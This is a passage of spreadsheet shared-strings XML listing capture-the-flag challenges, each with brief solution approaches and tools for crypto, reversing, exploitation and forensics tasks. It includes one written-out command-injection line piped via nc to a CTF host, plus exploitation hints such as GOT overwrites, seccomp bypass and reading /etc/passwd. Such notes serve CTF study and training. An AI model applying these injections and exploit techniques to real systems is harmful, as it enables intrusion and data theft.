    <t>It is possible to derive all necessary pieces of the RSA equation to break the cipher from the given data. Only hitch is you must write your own script</t>
  </si>
  <si>
    <t>secret_file-150</t>
  </si>
  <si>
    <t>strcpy</t>
  </si>
  <si>
    <t>stack buffer overflow</t>
  </si>
  <si>
    <t>salt</t>
  </si>
  <si>
    <t xml:space="preserve">Due to the properties of XOR it is possible to decrypt the message by simply XORing the ciphertext </t>
  </si>
  <si>
    <t>Smart Cipher System</t>
  </si>
  <si>
    <t>Partially known chosen plaintext attack agsinst the keys</t>
  </si>
  <si>
    <t>Alicegame</t>
  </si>
  <si>
    <t xml:space="preserve">El Gamal </t>
  </si>
  <si>
    <t>Given the encryption scheme, you need to write a sage script to calculate the necessary values</t>
  </si>
  <si>
    <t>regrettable ecc</t>
  </si>
  <si>
    <t>Have a solid understanding of ecliptic curve cryptography, and calculate the necessary variables</t>
  </si>
  <si>
    <t>Signer and verifier</t>
  </si>
  <si>
    <t xml:space="preserve">Make the signer portion of the service sign your provided message in two parts </t>
  </si>
  <si>
    <t>LCGsign</t>
  </si>
  <si>
    <t>DSA</t>
  </si>
  <si>
    <t>Math...https://github.com/pwning/public-writeup/blob/master/mma2015/crypto400-lcgsign/writeup.md</t>
  </si>
  <si>
    <t>Microsoft Z3 Solver</t>
  </si>
  <si>
    <t>mqaaa</t>
  </si>
  <si>
    <t>Decode the given base 64 string to reveal obfuscated JS, run the obfuscated code through the script</t>
  </si>
  <si>
    <t>game of life</t>
  </si>
  <si>
    <t>custom streamcipher</t>
  </si>
  <si>
    <t>The bitstream is encrypted using a conways game of life simulation. It's possible to create deadlocks in this simulation resulting the a large majority of the text being encrypted with all zeros. Use the script to reverse this and get the flag</t>
  </si>
  <si>
    <t>blockchain</t>
  </si>
  <si>
    <t>minecraft world file</t>
  </si>
  <si>
    <t>extract flag from minecraft world file.</t>
  </si>
  <si>
    <t xml:space="preserve">analyse state machine in the world, write python script to emulate machine. </t>
  </si>
  <si>
    <t>Weshgrow</t>
  </si>
  <si>
    <t>minecraft client, MC Edit, NBT</t>
  </si>
  <si>
    <t>HMAC</t>
  </si>
  <si>
    <t>Create a hmac collision to access the necessary pages to retrieve the flag</t>
  </si>
  <si>
    <t>CMS Mini, /etc/passwd &amp; cms/admin/config.php</t>
  </si>
  <si>
    <t>shell-300</t>
  </si>
  <si>
    <t>At-gunpoint</t>
  </si>
  <si>
    <t>manipulate instrction pointer to jump over the code to the flag</t>
  </si>
  <si>
    <t>pointer</t>
  </si>
  <si>
    <t>bgb</t>
  </si>
  <si>
    <t>overwrite pointer to /lib64/ld-linux-x86-64.so.2</t>
  </si>
  <si>
    <t>Big-jims-map</t>
  </si>
  <si>
    <t>ROP chain to find out address to backdoor</t>
  </si>
  <si>
    <t>uiuctf</t>
  </si>
  <si>
    <t>gitsmsg</t>
  </si>
  <si>
    <t>over allocate to array</t>
  </si>
  <si>
    <t>providied an encrypted image and the py script used to encrypt the image you must reverse the encryption using  known properties of QR code images</t>
  </si>
  <si>
    <t>Guess the flag</t>
  </si>
  <si>
    <t>whitehat contest ctf</t>
  </si>
  <si>
    <t>reverse code to get validated then brute force byte at a time</t>
  </si>
  <si>
    <t>Decode the file using basic arithmatic</t>
  </si>
  <si>
    <t>asis-hash</t>
  </si>
  <si>
    <t>get the flag</t>
  </si>
  <si>
    <t>Reverse the binary to learn more about the hash and grab the final hash your input it compared to. Then bruteforce the flag</t>
  </si>
  <si>
    <t>Gunslinger Joe's gold stash</t>
  </si>
  <si>
    <t>Web 4</t>
  </si>
  <si>
    <t>find string that is compared with password</t>
  </si>
  <si>
    <t>length extension attack against checksum value</t>
  </si>
  <si>
    <t>Gunslinger joe's private terminal</t>
  </si>
  <si>
    <t>/*/* expands /bin/bashbug causes $EDITOR to open vi</t>
  </si>
  <si>
    <t>Reversing-400</t>
  </si>
  <si>
    <t>Reversing-100</t>
  </si>
  <si>
    <t>Elrond32</t>
  </si>
  <si>
    <t>deconstruct arithmetic operations in recursive function</t>
  </si>
  <si>
    <t>Ooooooh! What does this button do?</t>
  </si>
  <si>
    <t>extract file twice and decompile to get java code</t>
  </si>
  <si>
    <t>dex2jar</t>
  </si>
  <si>
    <t>hellomike</t>
  </si>
  <si>
    <t>erlang</t>
  </si>
  <si>
    <t xml:space="preserve">reverse enginner 5 finite automata states to find the lexicographically smallest shortest string </t>
  </si>
  <si>
    <t>https://www.youtube.com/watch?v=uKfKtXYLG78, Erlang/OTP HiPE</t>
  </si>
  <si>
    <t>insanity_check</t>
  </si>
  <si>
    <t>x86 asm</t>
  </si>
  <si>
    <t xml:space="preserve">run strings command </t>
  </si>
  <si>
    <t>strings, hopper, idapro</t>
  </si>
  <si>
    <t>no-strings-attached</t>
  </si>
  <si>
    <t>jump to decrypt function, look at contents of EAX register, turn hex into ascii</t>
  </si>
  <si>
    <t>command: 'objdump -D -M intel no_strings_attached', gdb, hopper, https://en.wikibooks.org/wiki/X86_Disassembly/Calling_Conventions#CDECL</t>
  </si>
  <si>
    <t>polydata</t>
  </si>
  <si>
    <t>General Problemsolving - provide one input valid for 3 problems (misc)</t>
  </si>
  <si>
    <t>rolling</t>
  </si>
  <si>
    <t>enter string starting with 9 on execution to get proper execution flow, then trace functions for flag.</t>
  </si>
  <si>
    <t>radare, gdb, https://en.wikipedia.org/wiki/X86_calling_conventions#System_V_AMD64_ABI</t>
  </si>
  <si>
    <t>shmap</t>
  </si>
  <si>
    <t>brute force flag using python</t>
  </si>
  <si>
    <t>grep</t>
  </si>
  <si>
    <t>baybe crackme</t>
  </si>
  <si>
    <t xml:space="preserve">Pass more than one argument </t>
  </si>
  <si>
    <t>gdb, edb, hopper</t>
  </si>
  <si>
    <t>be a robot</t>
  </si>
  <si>
    <t>exploit atExit function using stack overflow</t>
  </si>
  <si>
    <t>breakpoints</t>
  </si>
  <si>
    <t>Use watchpoints to NOP call, then follow program execution</t>
  </si>
  <si>
    <t>kernel_land</t>
  </si>
  <si>
    <t>Find tick function, breakpoint, flag on third iteration</t>
  </si>
  <si>
    <t>qemu, objdump</t>
  </si>
  <si>
    <t>Old Wrold</t>
  </si>
  <si>
    <t>Atari 6502 Executable</t>
  </si>
  <si>
    <t>Reverse 6502 Atari to notice Event Handler, Press keys in correct order</t>
  </si>
  <si>
    <t>file</t>
  </si>
  <si>
    <t>rarara</t>
  </si>
  <si>
    <t>Strip x64 requirement, Strip antireversing, Crack CRC (reversing)</t>
  </si>
  <si>
    <t>Commercial Application</t>
  </si>
  <si>
    <t>crypto80</t>
  </si>
  <si>
    <t>access hidden 6th field ‘adb pull /data/data/edu.sharif.ctf/databases/db.db’</t>
  </si>
  <si>
    <t>adb (Android Debug Bridge), jadx, and apktool</t>
  </si>
  <si>
    <t>mp4</t>
  </si>
  <si>
    <t>find data hidden in video</t>
  </si>
  <si>
    <t>get the data stream hidden in sound track of video</t>
  </si>
  <si>
    <t>Reverse 200</t>
  </si>
  <si>
    <t>slow executable</t>
  </si>
  <si>
    <t>patch executable to make functions faster</t>
  </si>
  <si>
    <t>ffmpeg, multimon-ng</t>
  </si>
  <si>
    <t>Reverse 100</t>
  </si>
  <si>
    <t>misc70</t>
  </si>
  <si>
    <t>.Net</t>
  </si>
  <si>
    <t>traffic</t>
  </si>
  <si>
    <t>listen to traffic on local host on port 31337</t>
  </si>
  <si>
    <t>anaylze sniffed traffic</t>
  </si>
  <si>
    <t>dump zip payload and dump password</t>
  </si>
  <si>
    <t>misc80</t>
  </si>
  <si>
    <t>lupin-iii</t>
  </si>
  <si>
    <t>Reverse game logic -&gt; write script to automate playing</t>
  </si>
  <si>
    <t>dump hex to ascii</t>
  </si>
  <si>
    <t>jar30</t>
  </si>
  <si>
    <t>crackme fast</t>
  </si>
  <si>
    <t>johns-library</t>
  </si>
  <si>
    <t>find files in jar</t>
  </si>
  <si>
    <t>jar is a zip file</t>
  </si>
  <si>
    <t>unzip or jar xf</t>
  </si>
  <si>
    <t>input length</t>
  </si>
  <si>
    <t>int underflow</t>
  </si>
  <si>
    <t>grep40</t>
  </si>
  <si>
    <t>find key in file</t>
  </si>
  <si>
    <t>grep the key in file</t>
  </si>
  <si>
    <t>post40</t>
  </si>
  <si>
    <t>find flag in pcap</t>
  </si>
  <si>
    <t xml:space="preserve">Download File -&gt; Fix PE Header -&gt; reverse program -&gt; Automate Program </t>
  </si>
  <si>
    <t>cow40</t>
  </si>
  <si>
    <t>xvi32, notepad++</t>
  </si>
  <si>
    <t>PE32 EXE</t>
  </si>
  <si>
    <t>print flag in file</t>
  </si>
  <si>
    <t>create a soft link with the required ext</t>
  </si>
  <si>
    <t>redacted50</t>
  </si>
  <si>
    <t>pdf</t>
  </si>
  <si>
    <t>ezhp</t>
  </si>
  <si>
    <t>find text under blocks</t>
  </si>
  <si>
    <t>get the pdf image out</t>
  </si>
  <si>
    <t>pdftohtml or pdfimages</t>
  </si>
  <si>
    <t>hopper, gdb</t>
  </si>
  <si>
    <t>gcc</t>
  </si>
  <si>
    <t>spoof60</t>
  </si>
  <si>
    <t>gcc tool chain</t>
  </si>
  <si>
    <t>Create a proper key/certificate pair.</t>
  </si>
  <si>
    <t>Hopper, OpenSSL, ‘objdump -d libssl.so’, ‘ diff -Nu’</t>
  </si>
  <si>
    <t>find spoofed ip</t>
  </si>
  <si>
    <t>arp duplicate</t>
  </si>
  <si>
    <t>harry_potter</t>
  </si>
  <si>
    <t>python script and python shell script</t>
  </si>
  <si>
    <t>snap80</t>
  </si>
  <si>
    <t>hopper, strace</t>
  </si>
  <si>
    <t>jpeg</t>
  </si>
  <si>
    <t>find data in disk image</t>
  </si>
  <si>
    <t>kappa</t>
  </si>
  <si>
    <t>photorec, jpeg data from the FF D8 to the FF D9</t>
  </si>
  <si>
    <t>bulk_extractor, photorec</t>
  </si>
  <si>
    <t>paris</t>
  </si>
  <si>
    <t>png100</t>
  </si>
  <si>
    <t>bat, x86</t>
  </si>
  <si>
    <t>png, zip</t>
  </si>
  <si>
    <t>find data hidden in png</t>
  </si>
  <si>
    <t>png carry a zipped file</t>
  </si>
  <si>
    <t>tenement</t>
  </si>
  <si>
    <t>stripfile.py</t>
  </si>
  <si>
    <t>libseccomp2_2.1.0+dfsg-1_i386.deb, libjansson4_2.2.1-1_i386.deb</t>
  </si>
  <si>
    <t>tiffany</t>
  </si>
  <si>
    <t>find finite state machine in memory fragment</t>
  </si>
  <si>
    <t>serial number</t>
  </si>
  <si>
    <t>X86 ELF</t>
  </si>
  <si>
    <t>Use Peda to bruteforce the 256 possible states(reversing)</t>
  </si>
  <si>
    <t xml:space="preserve">Peda - Python Exploit Development Assistance </t>
  </si>
  <si>
    <t>reversing 100</t>
  </si>
  <si>
    <t>,NET</t>
  </si>
  <si>
    <t>7z start with 7z</t>
  </si>
  <si>
    <t>reverse .net to find key hidden in pictureBox1_click function</t>
  </si>
  <si>
    <t>7z x image.png</t>
  </si>
  <si>
    <t>http://pid.gamecopyworld.com/ (Detect binary packets), http://mark0.net/soft-trid.html (IDs files), Jetbrains .peek</t>
  </si>
  <si>
    <t>reversing 200</t>
  </si>
  <si>
    <t>ssh100</t>
  </si>
  <si>
    <t>find flag hidden in files</t>
  </si>
  <si>
    <t>compare with original files</t>
  </si>
  <si>
    <t>comparefiles.sh, meld</t>
  </si>
  <si>
    <t>Patch antidebugging check and if statement to print flag</t>
  </si>
  <si>
    <t>rain35</t>
  </si>
  <si>
    <t>reversing 300</t>
  </si>
  <si>
    <t>wav, tiff</t>
  </si>
  <si>
    <t>x86 Exe</t>
  </si>
  <si>
    <t>find flag in wav/tiff</t>
  </si>
  <si>
    <t>Executable is compiled with Py2Exe / PyInstaller, _meipass2 pyinstaller signature</t>
  </si>
  <si>
    <t>imagemagic, identify, convert</t>
  </si>
  <si>
    <t>http://www.pyinstaller.org/, WinDbg '.childdbg 1', http://www.py2exe.org/</t>
  </si>
  <si>
    <t>rob30</t>
  </si>
  <si>
    <t>jpg</t>
  </si>
  <si>
    <t>find title of book cover</t>
  </si>
  <si>
    <t>hop</t>
  </si>
  <si>
    <t>reverse serach book cover image to book title</t>
  </si>
  <si>
    <t>64bit windows exe</t>
  </si>
  <si>
    <t>find 128 jump targets for each of 40 set of states</t>
  </si>
  <si>
    <t>https://images.google.com/</t>
  </si>
  <si>
    <t>potter</t>
  </si>
  <si>
    <t>x86 asm &amp; C</t>
  </si>
  <si>
    <t xml:space="preserve">Use LD_PRELOAD to recompile shared library </t>
  </si>
  <si>
    <t>Hopper, ida, gdb</t>
  </si>
  <si>
    <t>seddit</t>
  </si>
  <si>
    <t>64bit elf</t>
  </si>
  <si>
    <t>Reverse executable to find how encryption key is being generated -&gt; trigger a basic overflow to leak the real encryption key (exploit / reversing / crypto)</t>
  </si>
  <si>
    <t>stegano50</t>
  </si>
  <si>
    <t>idaPatcher</t>
  </si>
  <si>
    <t>inBINcible</t>
  </si>
  <si>
    <t>find hidden message in file</t>
  </si>
  <si>
    <t>flag hidden via Morse code</t>
  </si>
  <si>
    <t xml:space="preserve">Dump XOR key from memory using GDB and reverse the key </t>
  </si>
  <si>
    <t>Gdb</t>
  </si>
  <si>
    <t>base64, pdftotext, SumatraPDF, tr , peepdf</t>
  </si>
  <si>
    <t>inMISCible</t>
  </si>
  <si>
    <t xml:space="preserve">after some reversing set enviroment variable "NO_CON_NAME" to the value Y! </t>
  </si>
  <si>
    <t>aski</t>
  </si>
  <si>
    <t xml:space="preserve">Breakpoint the ASCII Art Enumeration Function and dump the ASCII images </t>
  </si>
  <si>
    <t>elf quest 2</t>
  </si>
  <si>
    <t xml:space="preserve">restore multiple corrupted elf headers to finally extract good elf that prints flag </t>
  </si>
  <si>
    <t>hackme</t>
  </si>
  <si>
    <t>.tap</t>
  </si>
  <si>
    <t>johns-shuffle</t>
  </si>
  <si>
    <t xml:space="preserve">Reverse .tap file and breakpoint TEA encryption hash. Decrypt hash using all possible combinations </t>
  </si>
  <si>
    <t>https://sourceforge.net/projects/unrealspeccy/files/, IDA, http://gynvael.coldwind.pl/?id=158</t>
  </si>
  <si>
    <t>rsbo</t>
  </si>
  <si>
    <t>overflow variable to make loop counter 0</t>
  </si>
  <si>
    <t>hardware400</t>
  </si>
  <si>
    <t>x86_64</t>
  </si>
  <si>
    <t>find where program writes the key strokes, python script to reverse the storage</t>
  </si>
  <si>
    <t>MoonKV</t>
  </si>
  <si>
    <t>mkv</t>
  </si>
  <si>
    <t>flag hidden in MKV video</t>
  </si>
  <si>
    <t>extract alternate audio track and decode</t>
  </si>
  <si>
    <t>SSTV decoding software</t>
  </si>
  <si>
    <t>Vodka</t>
  </si>
  <si>
    <t>extract flag from router firmware</t>
  </si>
  <si>
    <t>capture firmware from pcap, mount, extract</t>
  </si>
  <si>
    <t>Wireshark / Tshark , Firmware-mod-kit, binwalk,  linux command: 'file', 'grep'</t>
  </si>
  <si>
    <t>WireTap</t>
  </si>
  <si>
    <t>wav</t>
  </si>
  <si>
    <t>simpleapk</t>
  </si>
  <si>
    <t>extract flag from .wav file</t>
  </si>
  <si>
    <t>flag contained inside of png file hidden in .wav</t>
  </si>
  <si>
    <t>decompile with apktool</t>
  </si>
  <si>
    <t>apktool</t>
  </si>
  <si>
    <t>vezel</t>
  </si>
  <si>
    <t>java decompiler</t>
  </si>
  <si>
    <t>python library wave, linux command: 'file'</t>
  </si>
  <si>
    <t>r0ops</t>
  </si>
  <si>
    <t>capsule</t>
  </si>
  <si>
    <t>broken capture packet</t>
  </si>
  <si>
    <t>run string on file-&gt;run pcapfix-&gt;wireshark-&gt;traffic with ascii art</t>
  </si>
  <si>
    <t>blobberry-300</t>
  </si>
  <si>
    <t>arm</t>
  </si>
  <si>
    <t>Reverse bootcode.bin, generate an appropriate key.</t>
  </si>
  <si>
    <t>important-day</t>
  </si>
  <si>
    <t>tcpdump</t>
  </si>
  <si>
    <t>time computer started</t>
  </si>
  <si>
    <t>wireshark packet, find Tsval then divide by ticks per second; bruteforce</t>
  </si>
  <si>
    <t>natural-algorithm</t>
  </si>
  <si>
    <t>find flag in image</t>
  </si>
  <si>
    <t>reverse image search</t>
  </si>
  <si>
    <t>ptot</t>
  </si>
  <si>
    <t>HD44780</t>
  </si>
  <si>
    <t>tictac</t>
  </si>
  <si>
    <t xml:space="preserve">Reverse digital controllers states and feed them into the emulator to print the flag </t>
  </si>
  <si>
    <t>encrypted strings</t>
  </si>
  <si>
    <t>decrypt only unique strings</t>
  </si>
  <si>
    <t>NordicByNature</t>
  </si>
  <si>
    <t>what-you-see</t>
  </si>
  <si>
    <t>ARM Coretex-Mx ASM</t>
  </si>
  <si>
    <t>png</t>
  </si>
  <si>
    <t xml:space="preserve">Dump firmware from lm3s811 microcontroller -&gt; reverse firmware and concat read-memory primitives to dump flag </t>
  </si>
  <si>
    <t>Diff image with original/brute force</t>
  </si>
  <si>
    <t>traces</t>
  </si>
  <si>
    <t>Oscilloscope CSV dump</t>
  </si>
  <si>
    <t xml:space="preserve">Reverse engineer CSV oscilloscope dump -&gt; Plot the dumped data as a PNG image -&gt; PNG image shows oscilloscope with flag on screen </t>
  </si>
  <si>
    <t>xorqr</t>
  </si>
  <si>
    <t>qr</t>
  </si>
  <si>
    <t>zbin</t>
  </si>
  <si>
    <t>QR code</t>
  </si>
  <si>
    <t>zbar, Image</t>
  </si>
  <si>
    <t>PPC Problem</t>
  </si>
  <si>
    <t>provide the index of the correct word in the dumped dictionary (reversing)</t>
  </si>
  <si>
    <t>qemu, debian s390x emulator</t>
  </si>
  <si>
    <t>huffy</t>
  </si>
  <si>
    <t>PlaidDB</t>
  </si>
  <si>
    <t>Huffman-tree,</t>
  </si>
  <si>
    <t>ruby script, find encoded nibbles, write as shellcode, padd shellcode</t>
  </si>
  <si>
    <t>https://github.com/kitctf/writeups/blob/master/gits2015/huffy/huffy.py</t>
  </si>
  <si>
    <t>Clifford</t>
  </si>
  <si>
    <t>Python-constraint</t>
  </si>
  <si>
    <t>cryptoserv</t>
  </si>
  <si>
    <t>x86 and pcap</t>
  </si>
  <si>
    <t>Jumble Mumble</t>
  </si>
  <si>
    <t>RE GEX</t>
  </si>
  <si>
    <t>delphi</t>
  </si>
  <si>
    <t>weirdshark</t>
  </si>
  <si>
    <t>SAT solving script</t>
  </si>
  <si>
    <t>fix packet error</t>
  </si>
  <si>
    <t>(echo -en 'go START;cat$IFS*.txt;STOP -38\n'; sleep 1) | nc delphi.termsec.net 5000</t>
  </si>
  <si>
    <t>convert to pcap, capture traffic</t>
  </si>
  <si>
    <t>reverse300</t>
  </si>
  <si>
    <t>DOS</t>
  </si>
  <si>
    <t>convert memory dump into binary then md5</t>
  </si>
  <si>
    <t>ida, dosbox, PkLite unpacker, dosbox debugger</t>
  </si>
  <si>
    <t>dumpster diving</t>
  </si>
  <si>
    <t>reverse500</t>
  </si>
  <si>
    <t>find exploit</t>
  </si>
  <si>
    <t>search ascii strings pipe with grep</t>
  </si>
  <si>
    <t>RC4_encrypt=RC4_decrypt, prevent setting flag PEB.BeingDebugged</t>
  </si>
  <si>
    <t>Ollydgb with Phantom</t>
  </si>
  <si>
    <t>ECHO</t>
  </si>
  <si>
    <t>gloriousmodern</t>
  </si>
  <si>
    <t>TEAM</t>
  </si>
  <si>
    <t>linked list</t>
  </si>
  <si>
    <t>fluffy no more</t>
  </si>
  <si>
    <t>vuln300</t>
  </si>
  <si>
    <t>hacked</t>
  </si>
  <si>
    <t>find bad javascript</t>
  </si>
  <si>
    <t>PDF Stream Dumper</t>
  </si>
  <si>
    <t>overwrite function pointer</t>
  </si>
  <si>
    <t>sushi</t>
  </si>
  <si>
    <t>amd64</t>
  </si>
  <si>
    <t>decrypt_img</t>
  </si>
  <si>
    <t>ASLR on</t>
  </si>
  <si>
    <t>bmp</t>
  </si>
  <si>
    <t>pattern</t>
  </si>
  <si>
    <t>bo</t>
  </si>
  <si>
    <t>exploitable</t>
  </si>
  <si>
    <t>strings file | grep 'flag'</t>
  </si>
  <si>
    <t>wildblueyonder</t>
  </si>
  <si>
    <t>camlmaze</t>
  </si>
  <si>
    <t>signed to unsigned interger using atoi()</t>
  </si>
  <si>
    <t>dump memory and python script</t>
  </si>
  <si>
    <t>hackertool</t>
  </si>
  <si>
    <t>freak</t>
  </si>
  <si>
    <t>torrent</t>
  </si>
  <si>
    <t>md5 checksum torrent file</t>
  </si>
  <si>
    <t>x86, microsoft visual c++ 8</t>
  </si>
  <si>
    <t>pipe entire IPV4 range output to md5 sum</t>
  </si>
  <si>
    <t>patch jbe to ja, python script</t>
  </si>
  <si>
    <t>dantes_inferno</t>
  </si>
  <si>
    <t>www</t>
  </si>
  <si>
    <t>securecom</t>
  </si>
  <si>
    <t>custom canary</t>
  </si>
  <si>
    <t>hidden message in a torrent</t>
  </si>
  <si>
    <t>use the consecutive strcpys to overwrite the puts() call in the GoT and then have that trigger a call to your shellcode</t>
  </si>
  <si>
    <t>compare torrent to public</t>
  </si>
  <si>
    <t>meld</t>
  </si>
  <si>
    <t>replace all conditional jumps with nop</t>
  </si>
  <si>
    <t>Alewife</t>
  </si>
  <si>
    <t>Community College</t>
  </si>
  <si>
    <t>inview</t>
  </si>
  <si>
    <t>Oak Grove</t>
  </si>
  <si>
    <t>baby-playpen-fence</t>
  </si>
  <si>
    <t>remove code and find message in whitespace</t>
  </si>
  <si>
    <t>3DSX homebrew</t>
  </si>
  <si>
    <t>convert spaces to 0 and tabs to 1</t>
  </si>
  <si>
    <t>sandbox of ubuntu 14.04</t>
  </si>
  <si>
    <t>IDA 3DSX loader https://github.com/0xEBFE/3DSX-IDA-PRO-Loader</t>
  </si>
  <si>
    <t>feature x32 abi turn 64bit syscall with 32bit pointers allows bypass of seccomp</t>
  </si>
  <si>
    <t>one</t>
  </si>
  <si>
    <t>youtube</t>
  </si>
  <si>
    <t>look at second train</t>
  </si>
  <si>
    <t>train number is flag</t>
  </si>
  <si>
    <t>portal</t>
  </si>
  <si>
    <t>Sullivan Square</t>
  </si>
  <si>
    <t>find image in audiofile</t>
  </si>
  <si>
    <t>ruby bytecode</t>
  </si>
  <si>
    <t>get text and decode to view image</t>
  </si>
  <si>
    <t>ruby script</t>
  </si>
  <si>
    <t>Rubinius https://github.com/rubinius/rubinius/tree/40040f9956833ac13774d745e961c743eeeefcbb</t>
  </si>
  <si>
    <t>pavucontrol ‘avconv -i credits.ogv -map 0:2 -acodec copy out.ogg’</t>
  </si>
  <si>
    <t>big prison fence</t>
  </si>
  <si>
    <t>sandbox seccomp</t>
  </si>
  <si>
    <t>leak flag bit at a time with exit print message call</t>
  </si>
  <si>
    <t xml:space="preserve">Math Sequence </t>
  </si>
  <si>
    <t>pwn the binary</t>
  </si>
  <si>
    <t xml:space="preserve">pretty advanced use after free vunerablility </t>
  </si>
  <si>
    <t>revenge-of-imgception</t>
  </si>
  <si>
    <t>get image off of server and find the file hidden within</t>
  </si>
  <si>
    <t>extract two .bmp files and subtract the byte values</t>
  </si>
  <si>
    <t>Saw this - 1</t>
  </si>
  <si>
    <t>Misc 300</t>
  </si>
  <si>
    <t>ey or</t>
  </si>
  <si>
    <t>guess the magic numbers</t>
  </si>
  <si>
    <t>brainfuck</t>
  </si>
  <si>
    <t>leak the seed() using an off-by-one vunerability and guess the numbers (pwn)</t>
  </si>
  <si>
    <t>run program in Brainloller</t>
  </si>
  <si>
    <t>Bruteforce the secret and enter the values in the correct sequence</t>
  </si>
  <si>
    <t>Brainloller</t>
  </si>
  <si>
    <t>exiftool</t>
  </si>
  <si>
    <t>Admin 100</t>
  </si>
  <si>
    <t>dig Wikipedia article</t>
  </si>
  <si>
    <t>‘dig +short txt mars.wp.dg.cx @8.8.8.8’</t>
  </si>
  <si>
    <t>Joy-500</t>
  </si>
  <si>
    <t>find address</t>
  </si>
  <si>
    <t>google landmarks and use stree tview</t>
  </si>
  <si>
    <t>Recon-100</t>
  </si>
  <si>
    <t>google Elton Badget</t>
  </si>
  <si>
    <t>first link in google</t>
  </si>
  <si>
    <t>flash</t>
  </si>
  <si>
    <t>Recon-200</t>
  </si>
  <si>
    <t>visit Facebook page</t>
  </si>
  <si>
    <t xml:space="preserve">vunerability in calc_md5 function allows for custom written signatures </t>
  </si>
  <si>
    <t>watch twitch.tv vod</t>
  </si>
  <si>
    <t>Recon-300</t>
  </si>
  <si>
    <t>find illegal actions on Facebook page</t>
  </si>
  <si>
    <t>search audio files, flag on album cover</t>
  </si>
  <si>
    <t>libdroid</t>
  </si>
  <si>
    <t>apk file - java</t>
  </si>
  <si>
    <t>Recond-400</t>
  </si>
  <si>
    <t xml:space="preserve">reverse phoneHome() function, find the value of 'e' that causes localObject1 to change and print the flag '103875' </t>
  </si>
  <si>
    <t>locate Dota2 account</t>
  </si>
  <si>
    <t>Dex2jar, JD-GUI, hopper, ida, radare</t>
  </si>
  <si>
    <t>watch Dota2 replay</t>
  </si>
  <si>
    <t>Stegano-200</t>
  </si>
  <si>
    <t>elevate</t>
  </si>
  <si>
    <t>extract file</t>
  </si>
  <si>
    <t>brute force python script</t>
  </si>
  <si>
    <t>python PIL module</t>
  </si>
  <si>
    <t xml:space="preserve">create a dummy flag file in the current directory with your password and then enter that into the binary when prompted </t>
  </si>
  <si>
    <t>open sesame</t>
  </si>
  <si>
    <t>decompile .java with jd-gui -&gt; flag is scattered throughout code (reversing)</t>
  </si>
  <si>
    <t>jd-gui</t>
  </si>
  <si>
    <t>Erik, Baleog and Olaf</t>
  </si>
  <si>
    <t>pngcheck for URL</t>
  </si>
  <si>
    <t>diff given image with the one in the URL</t>
  </si>
  <si>
    <t>pngcheck, ImageMagick</t>
  </si>
  <si>
    <t>geocap</t>
  </si>
  <si>
    <t>...what?</t>
  </si>
  <si>
    <t xml:space="preserve">write custom pcap-ng parser </t>
  </si>
  <si>
    <t>010editor, http://www.winpcap.org/ntar/draft/PCAP-DumpFileFormat.html</t>
  </si>
  <si>
    <t xml:space="preserve">enviroment variable and stackoverflow trickery to execute shell </t>
  </si>
  <si>
    <t>altered code</t>
  </si>
  <si>
    <t>Obfuscated code</t>
  </si>
  <si>
    <t>Code is indented with tabs and spaces. Remove tabs and execute code(forensics)</t>
  </si>
  <si>
    <t>yee-haw cowboy!</t>
  </si>
  <si>
    <t>any text editor</t>
  </si>
  <si>
    <t>find the owner</t>
  </si>
  <si>
    <t>link flag.txt to a .cow file then run the executable. (Nearly identical to Picoctf's supercow problem)</t>
  </si>
  <si>
    <t>Flag is Md5 of Ip:port</t>
  </si>
  <si>
    <t>Run file in Sandbox enviroment, research worm, md5 ip:port(forensics)</t>
  </si>
  <si>
    <t>Malwr.com, Bitfrost malware</t>
  </si>
  <si>
    <t>oldskoo1</t>
  </si>
  <si>
    <t>x86 xbox code</t>
  </si>
  <si>
    <t>nop the region that produces red box</t>
  </si>
  <si>
    <t>redirect output of non-blacklisted commands to our socket</t>
  </si>
  <si>
    <t>database</t>
  </si>
  <si>
    <t>look closer</t>
  </si>
  <si>
    <t>hopper, radare2</t>
  </si>
  <si>
    <t>Rar File</t>
  </si>
  <si>
    <t>Find flag in rar file</t>
  </si>
  <si>
    <t>Given Rar File, Convert to PNG, open img.</t>
  </si>
  <si>
    <t>my little pwnie</t>
  </si>
  <si>
    <t>linux cmd: file</t>
  </si>
  <si>
    <t>pwntools, hopper</t>
  </si>
  <si>
    <t xml:space="preserve">Problem ? </t>
  </si>
  <si>
    <t>Find hidden flag</t>
  </si>
  <si>
    <t>Flag hidden on CTF scoreboard</t>
  </si>
  <si>
    <t>interstellar</t>
  </si>
  <si>
    <t>So Basic</t>
  </si>
  <si>
    <t>python script to reverse XNOR order</t>
  </si>
  <si>
    <t>Find flag hidden across multiple files</t>
  </si>
  <si>
    <t>awesome web</t>
  </si>
  <si>
    <t>Cat all 39 files, Calculate Md5, Concat Hex bytes in correct order</t>
  </si>
  <si>
    <t>linux command: 'sed', 'xxd'</t>
  </si>
  <si>
    <t>USB is Fun</t>
  </si>
  <si>
    <t xml:space="preserve">download provided admin key and ssh into the server. Use ' echo "$(cat flag.txt)" ' to retrieve the flag </t>
  </si>
  <si>
    <t>Find flag hidden in USB files</t>
  </si>
  <si>
    <t>Run the standard 'strings | grep' command</t>
  </si>
  <si>
    <t>can you follow me, neo?</t>
  </si>
  <si>
    <t>yayaya</t>
  </si>
  <si>
    <t xml:space="preserve">reverse the given bash command to undo the original operations </t>
  </si>
  <si>
    <t>Swf flash</t>
  </si>
  <si>
    <t>Find flag in swf file</t>
  </si>
  <si>
    <t>Parallel comparator</t>
  </si>
  <si>
    <t>compile .swf with flascc and manually record blocks</t>
  </si>
  <si>
    <t>c / c++</t>
  </si>
  <si>
    <t>FlasCC</t>
  </si>
  <si>
    <t xml:space="preserve">user string must be equal to 0, solved by the equation 'Input = 0 ⊕ (108 + Differences))' </t>
  </si>
  <si>
    <t>Hear with your Eyes</t>
  </si>
  <si>
    <t>Secret galaxy</t>
  </si>
  <si>
    <t>find what’s hidden in the audio file</t>
  </si>
  <si>
    <t>use spectogram to get flag</t>
  </si>
  <si>
    <t>audacity</t>
  </si>
  <si>
    <t>Hidden Message</t>
  </si>
  <si>
    <t xml:space="preserve">binary contains a mapped structure that contains ptr's to the next item. Find the item that isn't printed out though normal execution (reversing) </t>
  </si>
  <si>
    <t>use tshark to find hidden message</t>
  </si>
  <si>
    <t>tshark</t>
  </si>
  <si>
    <t>Simple Check</t>
  </si>
  <si>
    <t>set rax register to non zero value in the &lt;check_key&gt; function 'set $rax = 1' (reversing)</t>
  </si>
  <si>
    <t>Recover Deleted File</t>
  </si>
  <si>
    <t>husavik</t>
  </si>
  <si>
    <t>disk image</t>
  </si>
  <si>
    <t>.apk - java</t>
  </si>
  <si>
    <t>flag hidden in apk</t>
  </si>
  <si>
    <t>recover deleted data</t>
  </si>
  <si>
